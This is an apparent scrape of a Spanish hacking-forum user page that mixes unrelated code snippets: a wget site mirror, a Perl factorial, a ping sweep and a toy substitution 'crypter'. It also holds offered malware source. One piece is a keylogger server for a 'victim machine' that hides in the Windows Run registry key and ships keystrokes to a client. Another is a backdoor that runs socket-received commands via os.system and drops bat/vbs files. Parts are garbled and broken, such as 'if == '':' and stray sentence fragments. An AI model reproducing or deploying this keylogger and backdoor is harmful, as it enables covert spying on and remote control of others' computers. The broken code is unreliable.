Bueno un simple script que descarga la web completa que quieras.
Código: text
Saludos.
echo "Ingresa la web a descargar:"
read web
wget -r -l 4 -x -np -N $webSaludos.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes Menúecho "Ingresa la web a descargar:"
read web
wget -r -l 4 -x -np -N $web#!/usr/bin/perl
print "Vamos a calcular el factorial. \n";
print "\n";
print "De que numero quieres calcular su factorial?: \n";
print "\n";
$numero = <>;
$total = 1;
for($i = 1 ; $i <= $numero ; $i++ ) {
$total = $total * $i;
}
print "El factorial es: ", $total;
print "\n";import os
import re
import sys
a = re.compile(r"(\d) received")
b = ("\033[31mvacio\033[0m","\033[33mduda\033[0m","\033[32mocupado\033[0m")
octetos = raw_input("Elige los 3 primeros octetos de tu red (ej:192.168.0.): ")
for cuarto in range(1,255):
ip = octetos+str(cuarto)
ping = os.popen(str("ping -q -c2 "+ip),"r")
print "Comprobando ",ip,", estado:",
sys.stdout.flush()
while 1:
c = ping.readline()
if not c: break
d = re.findall(a,c)
if d:
print b[int(d[0])]

 pero más lento
pero más lento  , nos dá la opción de elegir entre una serie de caracteres con los que hacer el ataque o podemos elegir que caracteres queremos que use.
, nos dá la opción de elegir entre una serie de caracteres con los que hacer el ataque o podemos elegir que caracteres queremos que use.

import wx
from wx import xrc
class Prog(wx.App):
def OnInit(self):
self.res = xrc.XmlResource('recursos.xrc')
self.frame = self.res.LoadFrame(None, 'Frame1')
self.dialog = self.res.LoadDialog(None, 'Dialog1')
self.botonLimpiar = xrc.XRCCTRL(self.frame, 'button1')
self.frame.Bind(wx.EVT_BUTTON, self.Limpiar, self.botonLimpiar)
self.botonLimpiar2 = xrc.XRCCTRL(self.frame, 'button2')
self.frame.Bind(wx.EVT_BUTTON, self.Limpiar2, self.botonLimpiar2)
self.botonCryptar = xrc.XRCCTRL(self.frame, 'button4')
self.frame.Bind(wx.EVT_BUTTON, self.Cryptar, self.botonCryptar)
self.botonDecryptar = xrc.XRCCTRL(self.frame, 'button5')
self.frame.Bind(wx.EVT_BUTTON, self.Decryptar, self.botonDecryptar)
self.botonAbout = xrc.XRCCTRL(self.frame, 'button3')
self.frame.Bind(wx.EVT_BUTTON, self.About, self.botonAbout)
self.Texto = xrc.XRCCTRL(self.frame, 'textCtrl1')
self.Texto2 = xrc.XRCCTRL(self.frame, 'textCtrl2')
self.DirFil = xrc.XRCCTRL(self.frame, 'textCtrl3')
self.frame.Show()
return True
def Limpiar(self, event):
self.Texto.Clear()
def Limpiar2(self, event):
self.Texto2.Clear()
def About(self, event):
self.dialog.Show()
def Cryptar(self, event):
li = self.Texto.GetNumberOfLines()
le = 0
while le <= li - 1:
lin = self.Texto.GetLineText(le)
text = lin
salir = False
v3 = 0
while v3 <= 26:
v1 = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", " "]
v2 = ["1-", "2-", "3-", "4-", "5-", "6-", "7-", "8-", "9-", "10-", "11-", "12-", "13-", "14-", "15-", "16-", "17-", "18-", "19-", "20-", "21-", "22-", "23-", "24-", "25-", "26-", "27-"]
text = text.replace(v1[v3], v2[v3])
v3 = v3 + 1
self.Texto2.WriteText(text + "\n")
le = le + 1
wx.MessageBox("Texto encriptado correctamente")
def Decryptar(self, event):
li = self.Texto.GetNumberOfLines()
le = 0
while le <= li - 1:
lin = self.Texto.GetLineText(le)
text = lin
salir = False
v3 = 0
while v3 <= 26:
v1 = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", " "]
v2 = ["1-", "2-", "3-", "4-", "5-", "6-", "7-", "8-", "9-", "10-", "11-", "12-", "13-", "14-", "15-", "16-", "17-", "18-", "19-", "20-", "21-", "22-", "23-", "24-", "25-", "26-", "27-"]
text = text.replace(v2[v3], v1[v3])
v3 = v3 + 1
self.Texto2.WriteText(text + "\n")
le = le + 1
wx.MessageBox("Texto desencriptado correctamente")
if __name__ == '__main__':
Crypter = Prog()
Crypter.MainLoop()<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
<resource xmlns="http://www.wxwindows.org/wxxrc" version="2.3.0.1">
<object class="wxFrame" name="Frame1">
<style>wxDEFAULT_FRAME_STYLE|wxSTAY_ON_TOP|wxTAB_TRAVERSAL</style>
<size>500,600</size>
<bg>#000000</bg>
<title>d33k40 De/Crypter Text v2.0</title>
<centered>1</centered>
<object class="wxBoxSizer">
<orient>wxVERTICAL</orient>
<object class="sizeritem">
<option>0</option>
<flag>wxALL|wxALIGN_CENTER_HORIZONTAL</flag>
<border>5</border>
<object class="wxStaticBitmap" name="bitmap1">
<bitmap>sc.png</bitmap>
</object>
</object>
<object class="sizeritem">
<option>1</option>
<flag>wxEXPAND</flag>
<border>5</border>
<object class="wxBoxSizer">
<orient>wxHORIZONTAL</orient>
<object class="sizeritem">
<option>1</option>
<flag>wxEXPAND</flag>
<border>5</border>
<object class="wxBoxSizer">
<orient>wxVERTICAL</orient>
<object class="sizeritem">
<option>0</option>
<flag>wxALL|wxALIGN_CENTER_HORIZONTAL</flag>
<border>5</border>
<object class="wxStaticText" name="staticText1">
<fg>#00ff00</fg>
<label>Texto:</label>
</object>
</object>
<object class="sizeritem">
<option>0</option>
<flag>wxALL|wxALIGN_CENTER_HORIZONTAL</flag>
<border>5</border>
<object class="wxButton" name="button1">
<label>Limpiar</label>
<default>0</default>
</object>
</object>
</object>
</object>
<object class="sizeritem">
<option>0</option>
<flag>wxALL</flag>
<border>5</border>
<object class="wxTextCtrl" name="textCtrl1">
<style>wxHSCROLL|wxTE_MULTILINE</style>
<size>400,70</size>
<bg>#00ff00</bg>
<fg>#000000</fg>
<value></value>
<maxlength>0</maxlength>
</object>
</object>
</object>
</object>
<object class="sizeritem">
<option>1</option>
<flag>wxEXPAND</flag>
<border>5</border>
<object class="wxBoxSizer">
<orient>wxHORIZONTAL</orient>
<object class="sizeritem">
<option>1</option>
<flag>wxEXPAND</flag>
<border>5</border>
<object class="wxBoxSizer">
<orient>wxVERTICAL</orient>
<object class="sizeritem">
<option>0</option>
<flag>wxALL|wxALIGN_CENTER_HORIZONTAL</flag>
<border>5</border>
<object class="wxStaticText" name="staticText2">
<fg>#00ff00</fg>
<label>Salida:</label>
</object>
</object>
<object class="sizeritem">
<option>0</option>
<flag>wxALL|wxALIGN_CENTER_HORIZONTAL</flag>
<border>5</border>
<object class="wxButton" name="button2">
<label>Limpiar</label>
<default>0</default>
</object>
</object>
</object>
</object>
<object class="sizeritem">
<option>0</option>
<flag>wxALL</flag>
<border>5</border>
<object class="wxTextCtrl" name="textCtrl2">
<style>wxHSCROLL|wxTE_MULTILINE</style>
<size>400,70</size>
<bg>#00ff00</bg>
<fg>#000000</fg>
<value></value>
<maxlength>0</maxlength>
</object>
</object>
</object>
</object>
<object class="sizeritem">
<option>1</option>
<flag>wxEXPAND|wxALIGN_CENTER_HORIZONTAL</flag>
<border>5</border>
<object class="wxBoxSizer">
<orient>wxHORIZONTAL</orient>
<object class="sizeritem">
<option>0</option>
<flag>wxALL|wxALIGN_CENTER_VERTICAL</flag>
<border>5</border>
<object class="wxButton" name="button3">
<label>About</label>
<default>0</default>
</object>
</object>
<object class="spacer">
<option>1</option>
<flag>wxEXPAND</flag>
<border>5</border>
<size>0,0</size>
</object>
<object class="sizeritem">
<option>0</option>
<flag>wxALL|wxALIGN_CENTER_VERTICAL</flag>
<border>5</border>
<object class="wxButton" name="button4">
<label>Crypt!</label>
<default>0</default>
</object>
</object>
<object class="spacer">
<option>1</option>
<flag>wxEXPAND</flag>
<border>5</border>
<size>0,0</size>
</object>
<object class="sizeritem">
<option>0</option>
<flag>wxALL|wxALIGN_CENTER_VERTICAL</flag>
<border>5</border>
<object class="wxButton" name="button5">
<label>Decrypt!</label>
<default>0</default>
</object>
</object>
</object>
</object>
<object class="sizeritem">
<option>0</option>
<flag>wxALL|wxALIGN_CENTER_HORIZONTAL</flag>
<border>5</border>
<object class="wxStaticText" name="staticText4">
<bg>#000000</bg>
<fg>#00ff00</fg>
<label>Coded by: d33k40</label>
</object>
</object>
<object class="sizeritem">
<option>0</option>
<flag>wxALL|wxALIGN_CENTER_HORIZONTAL</flag>
<border>5</border>
</object>
</object>
</object>
<object class="wxDialog" name="Dialog1">
<style>wxDEFAULT_DIALOG_STYLE|wxSTAY_ON_TOP</style>
<bg>#000000</bg>
<title>About</title>
<object class="wxBoxSizer">
<orient>wxVERTICAL</orient>
<object class="sizeritem">
<option>0</option>
<flag>wxALL|wxALIGN_CENTER_HORIZONTAL</flag>
<border>5</border>
<object class="wxStaticBitmap" name="bitmap2">
<bitmap>sc.png</bitmap>
</object>
</object>
<object class="sizeritem">
<option>0</option>
<flag>wxALL|wxALIGN_CENTER_HORIZONTAL</flag>
<border>5</border>
<object class="wxStaticText" name="staticText3">
<fg>#00ff00</fg>
<label>Coded by: d33k40\n\nAgradecimientos:\n- [Bacardi]\n- A la comunidad "Infierno Hacker", todos y cada uno\nde ellos.</label>
</object>
</object>
<object class="sizeritem">
<option>0</option>
<flag>wxALL|wxALIGN_CENTER_HORIZONTAL</flag>
<border>5</border>
</object>
</object>
</object>
</resource>

"""
Server Version
*KeyLogger.pyw
*Log all key strokes from victim machine
Features:
-Text File Transfer
-Version 1.2
"""
import os
import string
import sys
import win32api
import socket
from _winreg import *
def body():
try:
socket1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket1.bind((socket.gethostname(), 902))
socket1.listen(5)
conn, addr = socket1.accept()
except socket.error:
print "error with sockets"
else:
try:
keylog_file = open("C:\\keylog_file.txt","w")
except IOError:
print "Error grabbing file"
else:
while 1:
keyAscii = 0
for i in range(32, 256):
key_log = win32api.GetAsyncKeyState(i)
if key_log == -32767:
print i
key_end = 81
keylog_file.write(chr(i))
if i == key_end:
keylog_file.close()
keyin = open("C:\\keylog_file.txt","r")
data = keyin.read()
conn.send(data)
def regwrite():
aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRITE)
SetValueEx(aKey,"AciD Ice",0, REG_SZ, r"C:\your_project_name_here.pyw")
CloseKey(aKey)
CloseKey(aReg)
if == '':
class mainexecution:
regwrite()
body()"""
Client Version
*Client.py
*Log all key strokes from victim machine
Features:
-Text File Transfer
-Help
-About
-Version 1.2
"""
import socket
import os
def body():
print "AciD Ice Client V-1.1"
victim_IP = raw_input ("please input an IP to connect to ")
host = victim_IP
port = 902
addr = (victim_IP, 902)
try:
socket1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket1.connect(addr)
except socket.error:
print "failure to connect"
else:
print "connection Made to remote host =]"
try:
file = open("C:\\key_log_file2.txt","w")
except IOError:
print "error in file"
else:
logging()
data = socket1.recv(1024)
print data
file.write(data)
file.close()
def logging():
print "Logging keys..."
print "------------------------------"
if == '':
class mainprog:
body()


import socket
import os
#CLIENT
def body():
print "AciD Ice Client V-1.2"
victim_IP = raw_input ("please input an IP to connect to ")
host = victim_IP
port = 901
addr = (victim_IP, 901)
socket1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if(socket1.connect(addr)):
print "connection Made to remote host =]"
options()
text_finished0 = "cmd"
text_finished2 = "file_vbs"
text_finished3 = "file_bat"
text_finished4 = "file_text"
user_input = ""
while user_input != text_finished0 or text_finished2:
user_input = raw_input("input what you want to do? ")
socket1.send(user_input)
if user_input == text_finished0 or text_finished2 or text_finished3 or textfinished4:
break
options()
user_input = raw_input("What do you want to do? ")
if user_input == "cmd":
text_finished = "done"
file_text = ""
print "When finsihed having fun type 'done n"
while file_text != text_finished:
file_text = raw_input("please input the proper command: \n")
socket1.send(file_text)
if file_text == text_finished:
break
options()
user_input = raw_input("What do you want to do? ")
if user_input == "file_vbs":
text_finished3 = "done"
file_send = ""
print "when done type 'done'"
while text_finished3 != file_send:
file_send = raw_input("input a VISUAL BASIC SCRIPT file to send: \n")
file = open(file_send, "rb")
data = file.read()
file.close()
if(socket1.send(data)):
print file_send,"sent to",victim_IP,"on port 901"
if text_finished3 == file_send:
break
options()
user_input = raw_input("What do you want to do? ")
if user_input == "file_bat":
text_finished4 = "done"
file_send2 = ""
while text_finished4 != file_send2:
file_send2 = raw_input("input a BATCH file to send: \n")
file2 = open(file_send2, "rb")
data2 = file2.read()
file2.close()
if(socket1.send(data2)):
print file_send2,"sent to",victim_IP,"on port 901"
if text_finished4 == file_send2:
break
options()
user_input = raw_input("What do you want to do? ")
if user_input == "file_txt":
text_finished5 = "done"
file_send3 = ""
while text_finished5 != file_send3:
file_send3 = raw_input("input a TEXT file to send: \n")
file3 = open(file_send3, "rb")
data3 = file3.read()
file3.close()
if(socket1.send(data3)):
print file_send3,"sent to",victim_IP,"on port 901"
if text_finished5 == file_send3:
break
options()
user_input = raw_input("What do you want to do? ")
def options():
print "remote cmd line commands = 'cmd' "
print "open/close cd drive (coming soon) "
print "file transfer (vbs) = 'file_vbs' "
print "file transfer (bat) = 'file_bat' "
print "file transfer (txt) = 'file_txt' "
print "keylogger (coming soon) "
print "When finsihed having fun type 'done'"
if __name__ == '__main__':
class mainprog:
body()#SERVER
import os
import socket
import string
import sys
from _winreg import *
def body():
try:
socket1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket1.bind((socket.gethostname(), 901))
socket1.listen(5)
conn, addr = socket1.accept()
except socket.error:
print "error with sockets"
data = conn.recv(893892)
try:
file = open("C:\\hacked.vbs","w")
file2 = open("C:\\hacked.bat","w")
file3 = open("C:\\hacked.txt","w")
except IOError:
print "failed to open the programs"
while 1:
if data == "cmd":
data2 = conn.recv(1024)
os.system(data2)
if data == "file_vbs":
data3 = conn.recv(1024)
try:
file.write(data3)
file.close()
except IOError:
print "error"
if data == "file_bat":
data4 = conn.recv(1024)
try:
file2.write(data4)
file2.close()
except IOError:
print "error"
if data == "file_txt":
data5 = conn.recv(1024)
try:
file3.write(data5)
file3.close()
except IOError:
print "error"
def regwrite():
aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRITE)
SetValueEx(aKey,"AciD Ice",0, REG_SZ, r"C:\Server.exe")
CloseKey(aKey)
CloseKey(aReg)
if __name__ == '__main__':
class mainexecution:
regwrite()
body()#!/usr/bin/env python
print "###############################################"
print "# -d33k40 De/crypter- Coded by: d33k40"
print "# www[dot]infiernohacker[dot]com"
print "# Este es un modelo de De/Crypter, no es el final."
print "###############################################"
print "# Agradecimientos:"
print "# -Principalmente a [Bacardi]:"
print "# Por su ayuda en python, gracias."
print "# -Infierno Hacker:"
print "# Por ser una magnifica comunidad en la que todos aprendemos, gracias."
print "###############################################"
print "###############################################"
print "# Bienvenido al menu de -d33k40 De/crypter-"
print "###############################################"
print "# 1-Encriptar un texto."
print "# 2-Desencriptar un texto"
print "###############################################"
v1 = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"]
v2 = ["1-", "2-", "3-", "4-", "5-", "6-", "7-", "8-", "9-", "10-", "11-", "12-", "13-", "14-", "15-", "16-", "17-", "18-", "19-", "20-", "21-", "22-", "23-", "24-", "25-", "26-"]
def prog(elec):
if elec == 1:
crypt(raw_input("Ingresa el texto: "))
elif elec == 2:
decrypt(raw_input("Ingresa el texto: "))
else:
print "Error, no has elegido ninguna posible eleccion."
print "###############################################"
print "# Bienvenido al menu de -d33k40 De/crypter-"
print "###############################################"
print "# 1-Encriptar un texto."
print "# 2-Desencriptar un texto"
print "###############################################"
prog(raw_input("Ingresa 1 o 2 segun sea tu eleccion: "))
def seguir(seguir):
if seguir == "si":
print "###############################################"
print "# Bienvenido al menu de -d33k40 De/crypter-"
print "###############################################"
print "# 1-Encriptar un texto."
print "# 2-Desencriptar un texto"
print "###############################################"
prog(int(raw_input("Ingresa 1 o 2 segun sea tu eleccion: ")))
elif seguir == "no":
print "Hasta luego."
else:
print "Error."
seguir(raw_input("Deseas De/Encriptar algun texto mas? si/no: "))
def crypt(text):
texto = text
salir = False
v3 = 0
while v3 <= 25:
text = text.replace(v1[v3], v2[v3])
v3 = v3 + 1
print text
res = raw_input("Quieres guardar el texto encriptado? si/no: ")
if res == "si":
nombre = raw_input("Ingresa el nombre del archivo: ") + ".txt"
es = "Original: " + texto + " Encriptado: " + text
file(nombre, "w").write(es)
print "Texto guardado con exito"
seguir(raw_input("Deseas De/Encriptar algun texto mas? si/no: "))
else:
print "Hasta luego"
def decrypt(text):
texto = text
salir = False
v3 = 0
while v3 <= 25:
text = text.replace(v2[v3], v1[v3])
v3 = v3 + 1
print text
res = raw_input("Quieres guardar el texto desencriptado? si/no: ")
if res == "si":
nombre = raw_input("Ingresa el nombre del archivo: ") + ".txt"
es = "Encriptado: " + texto + " Original: " + text
file(nombre, "w").write(es)
print "Texto guardado con exito"
seguir(raw_input("Deseas De/Encriptar algun texto mas? si/no: "))
else:
print "Hasta luego"
prog(int(raw_input("Ingresa 1 o 2 segun sea tu eleccion: ")))